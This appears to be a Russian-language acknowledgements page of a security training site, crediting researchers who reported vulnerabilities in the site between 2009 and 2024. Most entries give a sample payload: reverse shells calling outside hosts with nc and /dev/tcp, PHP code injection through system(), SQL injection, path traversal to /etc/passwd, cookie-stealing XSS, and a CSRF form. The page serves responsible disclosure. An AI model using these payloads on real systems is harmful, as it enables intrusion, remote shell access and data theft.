Обнаруженные слабые стороны
Как и в любой информационной системе, на веб-сайте были выявлены некоторые недостатки.
26/08/2024 Mika
обнаружила уязвимость OS Command Injection, которая позволяет пользователю получить root-доступ к серверам вызовов при развертывании вызова с вредоносным флагом.
RM{' && nc.traditional 51.75.X.X 4444 -e /bin/bash #}
07/02/2024 Nishacid
Обнаружена хранимая XSS-уязвимость в переводах, позволяющая члену ассоциации изменить любой из переводов сайта с помощью JavaScript-кода, используя :
<img/src/onerror=confirm(document.domain)>
22/11/2023 Laluka
Выявлен хранимый XSS (через загрузку файла) для RCE через инъекцию кода на конфигурации mediabox. PHP-код отражается (json_dump) и затем оценивается; целевой учетной записью должен быть webmestre.
const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');
const formData = new FormData(form);
formData.append("lity[<?php echo system(base64_decode('aWQ='));?>]", 42);
14/07/2023 Elweth
Обнаружена уязвимость в версии Chrome Headless, используемой ботами для вызовов Web-клиента. Данная версия была уязвима к CVE-2021-21224, что могло привести к выполнению кода в окружении бота.
27/08/2022 Laluka
Обнаружена уязвимость, при которой изменение статуса содержимого сайта (doc, challenge, post, ...) на более высокий уровень (например, с draft на evaluation или с trash на writing) вызывает отправку электронного письма автору challenge и/или вебмастеру. Некоторые переменные, такие как заголовок и содержание, не были должным образом закодированы или экранированы перед передачей в функцию eval, которая формирует письмо. Это позволило осуществить Blind-RCE с такой полезной нагрузкой, как <?php system("bash -c 'id > /dev/tcp/42.42.42.42/4242'"); ?>
в заголовке или содержимом статьи.
send(eval($email));
21/07/2022 Abyss Watcherи SpawnZii
выявили уязвимость удаленного выполнения кода (RCE), позволяющую привилегированному пользователю выполнить PHP-код: Abyss Watcher SpawnZii
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>
11/07/2022 Abyss Watcher
выявлена хранимая XSS-уязвимость, эксплуатируемая с помощью iframe, размещенного на домене RM :
<iframe src="https://www.root-me.org/IMG/html/xss.html">
17/03/2022 Mizu
выявлена хранимая XSS-уязвимость, эксплуатируемая с помощью iframe, размещенного на вредоносном домене, начинающемся с www.root-me.org :
<iframe src="https://www.root-me.org.evil.domain/">
01/10/2021 Podalirius
выявлена уязвимость, позволяющая получить доступ к документам, прикрепленным к решениям, без ограничений:
<imgXX>
15/05/2020 Laluka
выявлено множество уязвимостей: 3 отраженных XSS, 2 SQLi и 1 RCE:
https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E
12/01/2020 NonStandardModel
выявлена XSS-уязвимость в имени файла, импортируемого на http://repository.root-me.org/. NonStandardModel
04/06/2019 warlock
выявлена XSS-уязвимость. Она требовала вмешательства пользователя в чатбокс (переход на предыдущую страницу).
http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>
04/06/2019 warlock
выявлена уязвимость, позволяющая непривилегированному пользователю убить базу данных, доступную на сервере challenge01, на котором размещено несколько вызовов, путем насыщения памяти определенным образом, чтобы убить выбранный им процесс. Это позволяло перезапустить другой двоичный файл, прослушивающий тот же порт, через состояние гонки.
12/10/2015 ST4HLKR1EG
выявлена уязвимость "Insecure Direct Object Reference", позволяющая прочитать любое личное сообщение :
page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]
15/06/2013
LouTerraillouneвыявил уязвимость инъекции PHP-кода на странице "code - decode":
Текст для декодирования в base64 :
PD9waHAgcGhwaW5mbygpOyA/Pg==
06/11/2012 jimee
обнаружено несколько хранимых XSS в управлении профилем пользователя :
<script>[code javascript/vbscript]</script>
20/03/2012 jimee
нашел LFI в вызове :
http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php
23/10/2011 courte66
обнаружен отраженный XSS на странице "encode - decode" :
Текст для декодирования в base64
Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=
02/10/2011 Hypnoze
обнаружены небезопасные косвенные ссылки на объекты, что привело к несанкционированному доступу ко всем PM :
http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]
11/07/2011 Armel
обнаружил сохраненный XSS на чатбоксе.
<iframe src="javascript:[code javascript]' />
18/07/2011 g0uZ
обнаружена уязвимость инъекции кода PHP в "online tools : nmap".
Хост для сканирования в режиме -sV :
--version-trace -p8888 [IP server attacker]
Служба, прослушивающая сервер атакующего
i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done
30/06/2011 elyfean
обнаружен CSRF на чатбоксе :
<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>
15/02/2011 EsSandre
нашел LFI :
http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd
02/02/2011 hello
обнаружил несколько хранимых XSS в системе PM :
<script>[code javascript/vbscript]</script>
02/12/2009 real
обнаружена уязвимость инъекции кода :
http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'